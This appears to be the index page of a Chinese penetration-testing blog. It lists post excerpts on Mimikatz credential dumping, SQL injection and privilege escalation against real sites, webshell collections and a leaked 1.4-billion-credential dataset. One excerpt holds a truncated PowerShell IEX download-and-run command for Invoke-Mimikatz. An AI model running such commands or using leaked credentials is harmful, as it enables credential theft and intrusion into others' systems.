小兵搞安全-51CTO博客

小兵搞安全

904W+
人气
1488
文章
4
关注
1783
粉丝

博客之星
讲师

关注私信

原创 896
翻译 2
转载 590
评论 2109
点赞 446

分享：

全部

simeon2005 专栏作者发布于：2020-04-29
0

Mimikatz获取系统密码***研究 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具，本意是用来个人测试，但由于其功能强大，能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于***测试，可以说是***必备工具，从早期1.0版本到现在的2.1.120180205版本，其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件（mimilib.dll、mimikatz.exe、mimidr

原创

阅读 572

评论 0

收藏 0
simeon2005 专栏作者发布于：2019-08-04
0

《sqlmap从入门到精通》已经正式出版原来只是想写一个专栏，后面发觉sqlmap真的非常牛逼，于是将相关知识整理成一本书，系统全面的介绍了sqlmap的使用，技巧和***利用技巧等。对于高手可以略过，对于想学安全的同学来说，有一定的借鉴，书中很多案例都是来自真实环境，有喜欢的朋友可以到京东进行购买，购买地址：https://item.jd.com/12671154.html

原创

阅读 3285

评论 2

收藏 0
simeon2005 专栏作者发布于：2019-04-03
2

陈小兵个人简介陈小兵，原海军某部网络安全研究员、公安部网络安全***实验员、曾就职于北京公安局网络安全总队，北理工计算机学院在读博士；主要从事网络安全***研究工作，在网络安全研究与培训、病毒防范、网络***等领域具有20年以上经验，在业内享有盛名。2018年受DEFONGROUP010（https://www.anquanke.com/post/id/101477）邀请在上海***沙龙做《内网***思路》主题分享（视频

原创

阅读 2391

评论 0

收藏 0
simeon2005 专栏作者发布于：2019-01-04
7

对某网站的一次扫描及渗透测试荐对某网站的一次渗透

原创

阅读 10000+

评论 2

收藏 10

赞赏 1
simeon2005 专栏作者发布于：2018-11-24
1

最近的一点点感想时间很快，不知不觉3个月就过去了，明天是去阿里上班的三个月时间，三个月中个人有很多变化，下面是自己的一些感想：一、忙碌充实的生活相对于公务员那种悠闲的生活，到企业中完全不一样，这里只有自我驱动，不管过程，只为结果买单。努力工作是基本的，仅仅努力还不够，还需要创新，需要多问自己一些问题，5W：when，who，why，w

原创

阅读 4371

评论 3

收藏 0
simeon2005 专栏作者发布于：2018-09-24
2

使用Netsparker扫描及**某站点目前市面上漏洞扫描软件有多款，前面介绍了一些扫描软件例如awvs对目标站点进行扫描，其实国外还有一款扫描软件Netsparker也挺厉害，扫描误报率低，扫描效果还不错。在本文中，对一个目标站点进行扫描，并未发现高危漏洞，但通过列目录漏洞以及敏感信息泄露文件，成功获取了某网站的webshell及其服务器权限

原创

阅读 10000+

评论 0

收藏 0

赞赏 1
simeon2005 专栏作者发布于：2018-08-10
1

《web网站安全评估分析及防御》新专栏上线有感在上一个《网络安全实战从入门到精通-SQLMAP》（https://blog.51cto.com/cloumn/detail/3）专栏订阅量出奇的好，目前在51cto所有付费专栏中排名第一！作为一个长期在战斗网络安全一线的老兵，一直在坚持技术的研究和学习，做任何事情只有在别人没有做之前完成积累，你才有优势。学习改变生活，学习改变命运，只要坚持不懈，方法得当，一定会获得成功，从2018年初到现在我将工

原创

阅读 5919

评论 0

收藏 0
simeon2005 专栏作者发布于：2018-07-10
0

AWS安全审计相关参考 AWS ArsenalDiscovery:Generate a report of all S3 buckets for an account: https://github.com/bear/s3scanFind open S3 buckets: https://github.com/sa7mon/S3ScannerGenerate Network Diagrams:&nbs

转载

阅读 5860

评论 1

收藏 0
simeon2005 专栏作者发布于：2018-06-25
7

国外14亿泄露数据下载及还原国外14亿泄露数据下载及还原simeon 2018年6月10日freebuf发布了篇文章《14亿邮箱泄露密码明文信息查询网站惊现网络》（链接地址：http://www.freebuf.com/news/174410.html），声称其泄露的数据可以通过暗网网站（http://dumpedlqezarfife.onion.lu/）进行查询，后

原创

阅读 10000+

评论 3

收藏 2

赞赏 1
simeon2005 专栏作者发布于：2018-06-25
0

国外14亿泄露数据下载及还原国外14亿泄露数据下载及还原simeon 2018年6月10日freebuf发布了篇文章《14亿邮箱泄露密码明文信息查询网站惊现网络》（链接地址：http://www.freebuf.com/news/174410.html），声称其泄露的数据可以通过暗网网站（http://dumpedlqezarfife.onion.lu/）进行查询，后

原创

阅读 7832

评论 0

收藏 0
simeon2005 专栏作者发布于：2018-06-17
0

1000个php代码审计样例 php代码审计可以参考：https://github.com/tennc/1000php

原创

阅读 9176

评论 0

收藏 0
simeon2005 专栏作者发布于：2018-06-17
0

webshell收集 https://github.com/tennc/webshell 各种webshell集合https://github.com/ysrc/webshell-samplewebshell样本https://github.com/xl7dev/WebShellWebshell && Backdoor Collectionhttps://github.com/td

转载

阅读 10000+

评论 2

收藏 2
simeon2005 专栏作者发布于：2018-06-07
0

Invoke-Mimikatz.ps1获取系统密码（1）Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1（2）具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadStr

原创

阅读 10000+

评论 0

收藏 1
simeon2005 专栏作者发布于：2018-06-05
0

soap注入某sql2008服务器结合msf进行提权 soap注入某sql2008服务器结合msf进行提权simeon 在实际成功×××过程中，漏洞的利用都是多个技术的融合，最新技术的实践，本次×××利用sqlmap来确认注入点，通过sqlmap来获取webshell，结合msf来进行ms16-075的提权，最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展，在常规Nday提权不成功的情况下，结合msf进行

原创

阅读 7224

评论 0

收藏 0
simeon2005 专栏作者发布于：2018-05-31
0

安全术语将成为历史，下决心学习英语很多安全术语将成为历史，没有hacker，没有。。。。。。这促使我们好好学习英语，用英语来写文章，来交流。以后文章中的敏感字用英语了。mark 一下。

原创

阅读 10000+

评论 0

收藏 0
simeon2005 专栏作者发布于：2018-05-30
21

使用sqlmap对某php网站进行注入实战及安全防范使用sqlmap对某php网站进行注入实战一般来讲一旦网站存在sql注入漏洞，通过sql注入漏洞轻者可以获取数据，严重的将获取webshell以及服务器权限，但在实际漏洞利用和测试过程中，也可能因为服务器配置等情况导致无法获取权限。1.1php注入点的发现及扫描1.使用漏洞扫描工具进行漏洞扫描将目标url地址放在wvs中进行漏洞扫描，

原创

阅读 10000+

评论 1

收藏 5
simeon2005 专栏作者发布于：2018-05-24
3

任何事情，努力才有可能，新书《网络安全实战-sqlmap从入门到精通》目录及架构最早的时候，仅仅是想在sqlmap上面多做一些研究，后面研究越来越深入，做了sqlmap***实战专栏，再后来觉得专栏内容会做到30+篇文章，昨天晚上构思了一下，觉得可以整理成一本书，算是今年的研究成果，任何事情，不努力永远没有机会，努力了，就有可能成功。《网络***实战-sqlmap从入门到精通》目录第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安

原创

阅读 6170

评论 7

收藏 1
simeon2005 专栏作者发布于：2018-05-23
4

WAR文件信息泄露及利用 1.1WAR文件信息泄露及利用1.1.1war简介WAR文件常见于Java应用中，WAR文件和JAR文件的文件格式是一样的，并且都是使用jar命令来创建，但就其应用来说，WAR文件和JAR文件是有根本区别的。JAR文件的目的是把类和相关的资源封装到压缩的归档文件中，而对于WAR文件来说，一个WAR文件代表了一个Web应用程序，它可以包含 Servlet、HTML页面、Java类、图像文件，以及组成

原创

阅读 9515

评论 2

收藏 2
simeon2005 专栏作者发布于：2018-05-21
2

完成sqlmap******入门到实战专栏文章初步目标《******入门到实战》专栏文章https://blog.51cto.com/cloumn/detail/3从推出到目前基本预订目标17章内容完成更新。回顾整个过程有以下一些感受：1.技术的东西必须深入，目前安全圈安全生态不是特别好，很多内容都是copy，笔者在对某些内容进行查看时，根据文章提供的内容根本无法重现，还需要从头再来，这就很浪费时间。在实际***或者ctf比赛中时间就是金钱，有时候多几分钟时

原创

阅读 3805

评论 1

收藏 1
simeon2005 专栏作者发布于：2018-05-21
0

国外搭建的公开漏洞测试平台 http://www.vulnweb.com/ 上面有针对asp、php、aspx等的sql注入漏洞等测试感兴趣的朋友，可以用这个来实际练习一下。

原创

阅读 5557

评论 0

收藏 0

首页
上一页
1
2
3
4
5
6
7
8
下一页
末页
共1488条记录

simeon2005

分享到朋友圈

让学习改变生活，让学习改变命运，终身学习

关注技术：Mysql Vmware 服务器&存储
入住博客：2006-05-23 14年

博主的视频课程

订阅专栏

Web网站安全评估分析及防御

企业级网安运维

￥51.00

订阅

网络安全入门到实战，让SQLmap子弹飞一会儿

9本网络安全实战书籍精华

￥51.00

订阅

七日热门

最近来访

写文章